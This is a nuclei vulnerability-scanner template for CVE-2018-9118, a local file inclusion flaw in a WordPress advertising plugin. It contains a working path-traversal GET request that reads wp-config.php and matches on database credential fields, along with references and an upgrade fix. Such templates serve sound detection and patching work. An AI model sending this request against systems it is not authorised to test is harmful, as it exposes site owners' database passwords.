nuclei-templates/cves/2018/CVE-2018-9118.yaml

40 lines
1.2 KiB
YAML

id: CVE-2018-9118
info:
name: WordPress 99 Robots WP Background Takeover Advertisements <=4.1.4 - Local File Inclusion
author: 0x_Akoko
severity: high
description: |
WordPress 99 Robots WP Background Takeover Advertisements 4.1.4 is susceptible to local file inclusion via exports/download.php.
reference:
- https://www.exploit-db.com/exploits/44417
- https://wpvulndb.com/vulnerabilities/9056
- https://99robots.com/docs/wp-background-takeover-advertisements/
- https://nvd.nist.gov/vuln/detail/CVE-2018-9118
remediation: |
Upgrade to 4.1.15.
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2018-9118
cwe-id: CWE-22
tags: cve,cve2018,wordpress,wp-plugin,lfi,traversal,wp
requests:
- method: GET
path:
- '{{BaseURL}}/wp-content/plugins/wpsite-background-takeover/exports/download.php?filename=../../../../wp-config.php'
matchers-condition: and
matchers:
- type: word
part: body
words:
- "DB_NAME"
- "DB_PASSWORD"
- "DB_HOST"
- "The base configurations of the WordPress"
condition: and
# Enhanced by mp on 2022/06/15